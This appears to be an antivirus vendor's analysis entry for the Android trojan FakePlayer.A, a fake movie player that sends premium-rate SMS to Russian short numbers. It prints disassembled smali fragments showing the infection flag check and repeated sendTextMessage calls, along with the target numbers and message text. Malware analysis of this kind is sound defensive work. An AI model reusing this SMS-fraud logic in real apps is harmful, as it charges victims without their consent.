AndroidOS/FakePlayer.A!tr - Released Aug 11, 2010 - Last Updated Sep 01, 2010
Visible SymptomsThe victim will experience a high bill due to premium rate SMS sending.Installation step:  Before launching: After installing the sample with the extension .apk a new "movie player" icon appears in the application panel.  Launching the application for the first time displays a message in russian, while it is sending sms messages:  |
Detailed AnalysisThe trojan takes the apparence of a movie player for the russian community. Actually the application sends 3 sms to two russian premium numbers.The customer will be charged the first time she runs the application. For this purpose the trojan checks the presence of an nfection flag in a database, via a call to the routine "canwe":
.line 29
.local v6, dh:Lorg/me/androidapplication1/DataHelper;
invoke-virtual {v6}, Lorg/me/androidapplication1/DataHelper;->canwe()Z
move-result v2
if-eqz v2, :cond_0
The malicious sample is included in an Android application package file (.apk extension). This setup package contains the core application code (.dex), the resources (icon, string, ...), the corresponding manifests and hashes of files: res/drawable/icon.png res/layout/main.xml res/values/strings.xml res/values/public.xml META-INF/MANIFEST.MF META-INF/CERT.RSA META-INF/CERT.SF classes.dex resources.arsc AndroidManifest.xml The core "classes.dex" is a Dalvik Excutable. It is executed by the Android Virtual Machine that uses a specific byte code. Some tools allow to disassemble the byte code to a low level language also used by Java: Jasmin .class public Lorg/me/androidapplication1/MoviePlayer; .super Landroid/app/Activity; .source "MoviePlayer.java" # direct methods .method public constructor The xml of the whole software allows us to know the "entry point" of the application: movieplayer class. The class reveals that the malicious behavior is effective one time due to a flag (via a database entry).
<activity android:label="Movie Player" android:name=".MoviePlayer">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
The malicious behavior consists in sending a sms to two russian premium numbers. One of this number is used twice.
.line 54
.local v0, m:Landroid/telephony/SmsManager;
const-string v1, "3353"
.line 55
.local v1, destination:Ljava/lang/String;
const-string v3, "798657"
.line 57
.local v3, text:Ljava/lang/String;
const/4 v2, 0x0
const/4 v4, 0x0
const/4 v5, 0x0
:try_start_0
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
.line 63
:goto_0
const-string v1, "3354"
...
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
...
const-string v1, "3353"
...
invoke-virtual/range {v0 .. v5}, Landroid/telephony/SmsManager;->sendTextMessage(Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;Landroid/app/PendingIntent;Landroid/app/PendingIntent;)V
:try_end_2
FYI, the author probably used the "HelloWorld" of Android SDK, the hint comes from the "main.xml" file of the layout ressources: <?xml version="1.0" encoding="UTF-8"?> <LinearLayout android:orientation="vertical" android:layout_width="fill_parent" android:layout_height="fill_parent" xmlns:android="http://schemas.android.com/apk/res/android">" <TextView android:layout_width="fill_parent" android:layout_height="wrap_content" android:text="Hello Android from NetBeans" /> </LinearLayout> The corresponding class isn't called, probably it was used to test the sending sms methods. We found a different russian message that can be translated into "Click OK to access the video library". |
Recommended Action
|
Reference: ID - 2051800
